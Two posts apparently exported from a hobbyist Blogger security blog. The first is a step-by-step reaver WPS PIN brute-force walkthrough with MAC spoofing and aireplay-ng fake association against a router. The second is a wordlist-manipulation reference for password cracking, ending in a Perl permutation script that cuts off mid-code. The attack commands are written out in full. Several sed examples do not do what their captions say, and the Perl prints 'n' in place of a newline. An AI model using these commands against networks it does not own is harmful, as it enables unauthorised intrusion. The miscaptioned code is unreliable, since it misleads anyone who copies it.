The way reaver works with mac spoofing is to ensure that the Physical interface also has the mac spoofed.<br />
<br />
Depends on your setup, however in my case<br />
> wlan0 physical interface.<br />
> mac address 00:11:22:33:44:55 as the mac address to be spoofed.<br />
<span style="color: lime;">ifconfig wlan0 down </span><br />
<span style="color: lime;">macchanger -m 00:11:22:33:44:55 wlan0 </span><br />
<span style="color: lime;">airmon-ng start wlan0</span><br />
<br />
<i>monitor mode then enabled on the created mon0 interface</i><br />
<br />
<span style="color: lime;">ifconfig mon0 down</span><br />
<span style="color: lime;">macchanger -m 00:11:22:33:44:55 mon0 </span><br />
<span style="color: lime;">ifconfig wlan0 up </span><br />
<div>
<span style="color: lime;">ifconfig mon0 up</span></div>
<div>
<br />
Then start up the reaver attack and it should all run as intended. <br />
--------<br />
<br />
<span style="color: red;"><i>Edit 28-01-2012</i></span><br />
--------<br />
I have been having issues with the latest version of reaver; v1.4, with it failing to associate<br />
whereas v1.3 associated fine.<br />
Apparently there are others also having issues when running it on BT5, some also seem<br />
to report that an apt-get update && apt-get upgrade on the BT5 system is what caused<br />
the problems for them.<br />
<br />
<a href="http://code.google.com/p/reaver-wps/issues/detail?id=172">http://code.google.com/p/reaver-wps/issues/detail?id=172</a> <br />
<br />
For the time being the author of reaver simply advises to stick with Ubuntu v10.4 which is<br />
his testing platform.<br />
<br />
So if you having trouble with reaver v1.4, perhaps try the previous version; reaver v1.3.</div>
<div>
<a href="http://code.google.com/p/reaver-wps/downloads/list">http://code.google.com/p/reaver-wps/downloads/list</a></div>
<div>
</div>
<div>
</div>
<div>
<br />
Would appreciate anyone's feedback on their experiences with v1.4 if there are any.<br />
--------<br />
<br />
<span style="color: red;"><i>Update 04-02-2012</i></span><br />
--------<br />
<br />
Well I have made some progress with reaver v1.4, the below done on a VMware BT5R1 image.<br />
<br />
Installed reaver v1.4 from the BT repositories ;<br />
<span style="color: lime;">apt-get update</span><br />
<span style="color: lime;">apt-get install reaver</span><br />
<br />
reaver v1.4 includes the new wash (formerly walsh)<br />
<br />
<span style="color: lime;">wash</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver01.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="422" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver01.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Carried out a quick scan with wash to get the details of my (now committed to the shelf of shame..) router.<br />
Using a wireless adapter with <i>Realtek RTL8187L chipset</i> with<i> rtl8187</i> driver in this case.<br />
Started the wireless interface on the channel of my AP (Channel 11)<br />
(as was having issues with aireplay-ng when I had not specified the channel that should be used)<br />
<span style="color: lime;">airmon-ng start wlan0 11</span><br />
<span style="color: lime;">wash -i mon0 -C</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="422" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver02.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now previously I was having trouble getting reaver v1.4 to associate to my router for some reason, so<br />
I decided to try to associate with another application, and then use the -A switch in reaver so as to not<br />
have reaver itself associate.<br />
<br />
So started aireplay-ng with fake association options.<br />
I found that having a longer delay resulted in a better performance with reaver, but you will have to play around to see what works best for your setup.<br />
<br />
<span style="color: lime;">aireplay-ng mon0 -1 120 -a 98:FC:11:8E:0E:9C -e FUBAR</span> <br />
<span style="color: lime;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver05.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver05.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Then fired up reaver v1.4 ;<br />
<br />
<span style="color: lime;">reaver</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="518" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver03.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
and started reaver v1.4 with the -A switch, to not have reaver associate with the router itself, in a separate terminal window ;<br />
<br />
<span style="color: lime;">reaver -i mon0 -A -b 98:FC:11:8E:0E:9C -v</span><br />
( there is a lot more output with reaver v1.4, wherefor only the single -v )<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver04.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver04.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The result ;<br />
A continuous stream of 2 seconds per pin attempt, which is much better than previously encountered<br />
with v1.3 to be honest.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver06.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="402" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/reaver06.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, at least there is a work around, however still strange that reaver v1.4 won't work 'out of the box'<br />
for me on BT.. Oh well, maybe v1.5 will be released to straighten things out ;)<br />
--------<br />
<b><span style="color: red;"><i>Edit 26-02-2012</i></span></b><br />
The latest upgrade to BT5 R2 seems to have helped with my association issues !<br />
Yay !<br />
So getting the latest and greatest on my HDD install of BT5 R1, doing an ;<br />
<span style="color: lime;">apt-get update </span><br />
<span style="color: lime;">apt-get dist-upgrade</span><br />
Did the trick for me in getting it working the way it was meant to.<br />
<br />
A fresh install of BT5 R2 is recommended as I was having issues again after updating<br />
to include the latest repositories as suggested in the <a href="http://www.backtrack-linux.org/backtrack/upgrading-to-backtrack-5-r2/" target="_blank">BackTrack blogpost</a>.<br />
<br />
For me, with a fresh install of BT5 R2, reaver is working well and as intended, and with<br />
the -d option set to 0 or 1 it really blasted through that router on the shelf of shame.<br />
--------<br />
<br />
<br />
<b><span style="color: red;">This type of attack is a real problem for many people and it would be more than foolish not to check your routers asap.</span></b><br />
<br />
<br />
So .. check your routers asap !</div>
</div>
Unknownnoreply@blogger.com108tag:blogger.com,1999:blog-8356530514965708840.post-66083570949975661162011-07-24T23:02:00.184+02:002013-01-28T15:01:35.128+01:00Wordlist manipulation revisited<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: red;">
<b>Work In Progress !</b></div>
<div style="color: red;">
<br /></div>
<b>Word List Manipulator</b><br />
<b>==================</b><br />
<b>A script to facilitate the commonly used options to make an existing </b><br />
<b>wordlist more to your liking.. </b><br />
<b>Downloads below and based on using the </b><b>script in Backtrack although it should work</b><br />
<b>in most Linux environments.</b><br />
<b><br /></b>
<b>Google code + WIKI ; </b>
<b><a href="http://code.google.com/p/wordlist-manipulator/" target="_blank">http://code.google.com/p/wordlist-manipulator/</a></b><br />
<b><br /></b>
<b><span style="color: red;"><u>Edit 21-10-2012</u></span></b><br />
<b>Release of WLM v0.7 ;</b><br />
<span style="color: #0000ee;"><b><u>http://www.mediafire.com/file/p1tn76qw95hobi4/wlm</u></b></span><br />
Video using WLM in BackBox ;<br />
<a href="http://www.youtube.com/watch?v=FpflByHLp1I">http://www.youtube.com/watch?v=FpflByHLp1I</a>
<br />
<br />
<br />
<b><iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/FpflByHLp1I" width="420"></iframe>
</b>
<b><br /></b>
<br />
--------------------------------------------<br />
<br />
<div style="color: yellow;">
<u><b>INTRO</b></u></div>
After my posts from just over 2 years ago (wow... thought I would have learned more by now .. )<br />
I thought it would be a good idea to have another, more detailed post on wordlist manipulations based on 'simple' one-liners or simple scripts (sometimes 1 line just doesn't cut it) which can be run over the wordlist.<br />
<br />
For some reason I always manage to forget the best way to do the simplest of things using sed and the like, so this is as much a reference for me, as it is hopefully some help to those looking for quick answers !<br />
My intention is that queries on wordlist manipulation posted in the comments are looked at and tested<br />
and then, I will try to post the best solution in doing same.<br />
<br />
There will be quite a bit duplication from the previous post on wordlist manipulation, but no harm in that,<br />
I find myself returing to 'old' info all the time..<br />
<br />
<br />
<div style="color: yellow;">
<u><br />
</u></div>
<div style="color: yellow;">
<u><b>MANIPULATING WORDLISTS</b></u></div>
<br />
When you have a wordlist, it often needs fine-tuning or alteration of some kind in order to get the<br />
most out of it, sometimes heavy-duty alteration, other times minor adjustments such as splitting the wordlist into manageable sizes or capitalizing the first letter for instance.<br />
<br />
The below examples are based on wordlists that have already been created and need some sort of tweaking or fine tuning.<br />
Of course you can create wordlists from scratch how you like with for instance crunch, however this post is meant solely for altering existing wordlists.<br />
<br />
Note that the below examples all done on BackTrack5 and not tested on any other OS.<br />
(although most commands should work on most linux based OS')<br />
<br />
<div style="color: yellow;">
<u><b>SPLITTING WORDLISTS</b></u></div>
<br />
One of the main issues with wordlists is that they can get hellish big.. and you may need to split them for;<br />
> for easy storage on portable drives,<br />
> some programs only accept a certain maximum wordlist size,<br />
> distributing segments of the wordlists to have tested by others,<br />
etc.<br />
etc.<br />
<br />
First thing to do is to check the size of the file and how many lines(passphrases) are in it so you can estimate<br />
how you can best split it.<br />
In this case using a 6 digit wordlist with lowecase alpha values only. <br />
Check the size of the wordlist ;<br />
For info on size in bytes ; <br />
<div style="color: lime;">
du -b wordlist1.txt</div>
or<br />
Simple view of size in 'human readable' format (eg. 100K, 100M, 100G); <br />
<div style="color: lime;">
du -h wordlist1.txt</div>
<br />
Get the linecount of the wordlist ;<br />
<div style="color: lime;">
wc -l wordlist1.txt</div>
<br />
So in the above example the size is around 112MB and there are 16777216<br />
lines (so 16777216 passphrases).<br />
When using split to split wordlists, it is best to use split by line count, so that you don't accidentally split the actual words as can happen when you split by size.<br />
<br />
Lets say we want to split that file into 3 wordlists, then the above file would need to be split into files containing +-5.500.000 words each.<br />
If you are too lazy to work the little grey cells, let 'bc' do the work for you so you can make an educated guess on how many lines you want to have per split wordlist ; <br />
<div style="color: lime;">
<br /></div>
<div style="color: lime;">
echo "16777216 / 3" | bc</div>
<br />
<div style="color: lime;">
split -d -l 5600000 wordlist1.txt split-list</div>
-d == giving a numeric suffix to the created split-list prefixes<br />
-l == giving the number of lines you want each file to have as a maximum<br />
wordlist1.txt is the input wordlist<br />
splitlist is the prefix for the newly created split files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/split.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/split.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>JOINING/COMBINING WORDLISTS</b></u></div>
<br />
To actually combine seperate wordlists to one list, you can use the 'cat' command as follows ;<br />
<span class="Apple-style-span" style="color: lime;">cat wordlist1.txt wordlist2.txt > combined-wordlist.txt</span><br />
<br />
Depending on the size of your wordlists this can take a wee while..<br />
<br />
You can also combine all .txt files in a directory to one larger file ;<br />
<span class="Apple-style-span" style="color: lime;">cat *.txt > combinedlists.txt </span><br />
<br />
<br />
<div style="color: yellow;">
<br /></div>
<div style="color: yellow;">
<u><b>CHANGING THE 'CASE' OF LETTERS IN A WORDLIST</b></u></div>
<br />
Changing characters in a wordlist at a given position to either lower case or upper case is a frequent necessity.<br />
Of course wordllists can easily be created with the required case in the required position (see my post on using the awesome crunch) however if you have an existing wordlist (which this post is all about) and need<br />
to adjust the cases as required, this is (one of the ways) how to go about it.<br />
<br />
<div style="color: yellow;">
</div>
<span style="color: yellow;">CAPITALIZING FIRST AND/OR LAST LETTERS</span> <br />
<br />
<u>First letter;</u><br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./\u&/' wordlist.txt</span><br />
<u><br />
</u><br />
<u>Last letter;</u><br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/\u&/' wordlist.txt</span><br />
<br />
<br />
CHANGING LETTERS TO LOWER / UPPER CASE<br />
<br />
Changing the first letters of all entries to upper case ; <br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./\u&/' wordlist.txt</span><br />
<br />
Changing the last letter of all entries to upper case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/\u&/' wordlist.txt</span><br />
<br />
Changing the first letter of all entries to lower case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./\l&/' wordlist.txt</span><br />
<br />
Changing the last letter of all entries to lower case ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/\l&/' wordlist.txt</span><br />
<br />
Changing all upper case to lower case letters;<br />
<span class="Apple-style-span" style="color: lime;">tr '[:upper:] ' '[:lower:]' < wordlist.txt</span><br />
<br />
Changing all lower case to upper case letters;<br />
<span class="Apple-style-span" style="color: lime;">tr '[:lower:]' '[:upper:]' < wordlist.txt</span><br />
<br />
<br />
Inverting the case in the words ;<br />
<div style="color: lime;">
tr 'a-z A-Z' 'A-Z a-z' < wordlist.txt</div>
or<br />
<span style="color: lime;">sed 'y/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz/' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>PREFIXING CHARACTER(S)/WORDS TO WORDLISTS</b></u></div>
<br />
To prefix the word "test" to all lines in the wordlist ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">awk '{print "test" $0 }' wordlist.txt</span><br />
<br />
<br />
<b><u>PREFIXING NUMERIC VALUES TO WORDLISTS</u></b><br />
<br />
To prefix 1 digit in sequence from 0 - 9 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 9 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix 2 digits in sequence from 00 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %02.0f$i 0 99 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix upto 2 digits in sequence from 0 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 99 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix 3 digits in sequence from 000 - 999<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %03.0f$i 0 999 ; done > numbers_wordlist.txt</span><br />
<br />
To prefix upto 3 digits in sequence from 0 - 999 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f %01.0f$i 0 999 ; done > numbers_wordlist.txt</span><br />
<div>
<br /></div>
<br />
<br />
<span class="Apple-style-span" style="color: yellow;"><u><b>SUFFIXING CHARACTER(S)/WORDS TO WORDLISTS</b></u></span><br />
<br />
To suffix the word "test" to each line in the wordlist ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">awk '{print $0 "test"}' wordlist.txt</span><br />
<br />
<br />
<b><u>SUFFIXING NUMERIC VALUES TO WORDLISTS</u></b><br />
<br />
To suffix 1 digit in sequence from 0 - 9<br />
<div>
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 9 ; done > wordlist_numbers.txt</span><br />
<div>
<br /></div>
</div>
To suffix 2 digits in sequence from 00 - 99<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%02.0f 0 99 ; done > wordlist_numbers.txt</span><br />
<br />
To suffix upto 2 digits in sequence from 0 - 99 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 99 ; done > wordlist_numbers.txt</span><br />
<div>
<br /></div>
To suffix 3 digits in sequence from 000 - 999 ;<br />
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%03.0f 0 999 ; done > wordlist_numbers.txt</span><br />
<br />
<div>
To suffix upto 3 digits in sequence from 0 - 999 ;</div>
<span class="Apple-style-span" style="color: lime;">for i in $(cat wordlist.txt) ; do seq -f $i%01.0f 0 999 ; done > wordlist_numbers.txt</span><br />
<br />
<br />
<br />
<div style="color: yellow;">
<b><u>INCLUDE CHARACTERS AT SPECIFIC POSITION</u></b></div>
<br />
To include the word "test" after the first 2 characters ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^../&test/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.\{2\}/&test/' wordlist.txt</span><br />
<br />
<br />
To include the word "test" before the last 2 characters ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/..$/test&/' wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.\{2\}$/test&/' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE X NUMBER OF CHARACTERS FROM START OF WORDLIST</b></u></div>
<br />
To replace the first character of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^./test/' wordlist.txt</span><br />
<br />
To replace the first 2 characters of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^../test/' wordlist.txt</span><br />
<br />
To replace the first 3 characters of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.../test/' wordlist.txt </span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^.\{3\}/test' wordlist.txt</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE/SUBSTITUTE X NUMBER OF CHARACTERS FROM END OF WORDLIST</b></u></div>
<br />
To replace the last character of each word with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed 's/.$/test/' wordlist.txt</span><br />
<br />
To replace the last 2 characters of each word with "test" ;<br />
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/..$/test/' wordlist.txt</span></div>
<br />
To replace the last 3 characters of each word with "test" ;<br />
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/...$/test/' wordlist.txt</span></div>
<div>
or</div>
<div>
<span class="Apple-style-span" style="color: lime;">sed 's/.\{3\}$/test/' wordlist.txt</span></div>
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>REPLACE/SUBSTITUTE CHARACTER(S) AT A CERTAIN POSITION</b></u></div>
<br />
To subsitute the third character of each word in the wordlist ; <br />
<br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{2})(.{1})/\1test/" wordlist.txt</span><br />
or<br />
<span class="Apple-style-span" style="color: lime;">sed 's/^\(.\{2\}\)\(.\{1\}\)/\1test/' wordlist.txt</span><br />
<br />
To subsitute the third and fourth character of each word in the wordlist with "test" ; <br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{2})(.{2})/\1test/" wordlist.txt</span><br />
<br />
<div>
To subsitute the fourth character of each word in the wordlist with "test" ;</div>
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{1})/\1test/" wordlist.txt</span><br />
<br />
To subsitute the fourth and fifth character of each word in the wordlist with "test" ;<br />
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt</span><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: red;">NOTE! </span></div>
<div>
If the number of characters that are to be replaced are actually more than there</div>
<div>
are characters in the word, the word will remain unaltered.</div>
<div>
So if doing </div>
<div>
<span class="Apple-style-span" style="color: lime;">sed -r "s/^(.{3})(.{2})/\1test/" wordlist.txt</span></div>
<div>
4 character letters such as the word 'beta' would not be altered as there is no fifth character. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span class="Apple-style-span" style="color: yellow;"><u><b>REVERSE THE DIRECTION OF THE WORDS IN WORDLIST</b></u></span></div>
<br />
<span class="Apple-style-span" style="color: lime;">rev wordlist.txt</span><br />
<br />
<br />
<br />
<br />
<b style="color: yellow;">REMOVING WORDS WHICH DON'T HAVE 'X' NUMBER OF NUMERIC VALUES</b><br />
<br />
To remove words from wordlist.txt that do not have 3 numeric values<br />
<br />
<span style="color: lime;">nawk 'gsub("[0-9]","&",$0)==3' wordlist.txt</span><br />
<br />
<br />
<b>REMOVE WORDS WITH X NUMBER OF REOCURRING CHARACTERS</b><br />
<br />
Under construction ;)<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b style="color: yellow;"><u>REMOVING WORDS WHICH HAVE MORE THAN 2 IDENTICAL ADJACENT CHARACTERS</u></b><br />
<br />
<span class="Apple-style-span" style="color: lime;"><acronym title="Stream Editor">sed</acronym> '/\([^A-Za-z0-9_]\|[A-Za-z0-9]\)\1\{2,\}/d' wordlist.txt</span><br />
<br />
<span style="color: lime;">sed "/\(.\)\1\1/d" wordlist.txt</span><br />
<br />
To delete words with more than 3 identical adjacent characters ;<br />
<br />
<span style="color: lime;">sed "/\(.\)\1\1\1/d" wordlist.txt</span>
<br />
<br />
<br />
Some great bit of work from Gitsnik on manipulating wordlists to ignore words with<br />
<div>
more than 2 adjacent identical characters ;<br />
<a href="http://gitsnik.blogspot.com/2011/08/unique-characters-from-crunch-redux.html">http://gitsnik.blogspot.com/2011/08/unique-characters-from-crunch-redux.html</a></div>
<div>
</div>
<br />
<br />
<b><span class="Apple-style-span" style="color: yellow;"><u>APPENDING WORDS FROM 1 WORDLIST TO ALL THE WORDS IN ANOTHER WORDLIST</u></span></b><br />
<br />
See Wordlist Manipulator script at top of page<b><span class="Apple-style-span" style="color: red;"></span></b><br />
<br />
<br />
<b>PERMUTE WORD / WORDLIST</b><br />
To give all possible variations of a word / wordlist, fantastic bit of perl by Gitsnik ;<br />
Copy / Paste the below and save as permute.pl<br />
chmod 755 permute.pl to make executable.<br />
<br />
to test on a single word (for instance "firewall") do ;<br />
cat firewall | ./permute.pl<br />
To test on a wordlist do ;<br />
./permute.pl wordlist.txt<br />
<br />
<br />
<span style="color: lime;">#!/usr/bin/perl</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">use strict;</span><br />
<span style="color: lime;">use warnings;</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">my %permution = (</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"a" => [ "a", "4", "@", "&", "A" ],</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"b" => "bB",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"c" => "cC",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"d" => "dD",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"e" => "3Ee",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"f" => "fF",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"g" => "gG9",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"h" => "hH",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"i" => "iI!|1",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"j" => "jJ",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"k" => "kK",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"l" => "lL!71|",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"m" => "mM",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"n" => "nN",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"o" => "oO0",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"p" => "pP",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"q" => "qQ",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"r" => "rR",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"s" => "sS5$",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"t" => "tT71+",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"u" => "uU",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"v" => "vV",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"w" => ["w", "W", "\/\/"],</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"x" => "xX",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"y" => "yY",</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>"z" => "zZ2",</span><br />
<span style="color: lime;">);</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"># End config</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">while(my $word = <>) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>chomp $word;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @string = split //, lc($word);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(0, @string);</span><br />
<span style="color: lime;">}</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;">sub permute {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $num = shift;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @str = @_;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $len = @str;</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($num >= $len) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>foreach my $char (@str) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print $char;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>print "n";</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $per = $permution{$str[$num]};</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($per) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @letters = ();</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(ref($per) eq 'ARRAY') {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>@letters = @$per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>@letters = split //, $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$per = "";</span><br />
<span style="color: lime;"><br /></span>
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>foreach $per (@letters) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my $s = "";</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(my $i = 0; $i < $len; $i++) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq 0) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq $num) {</span><br />
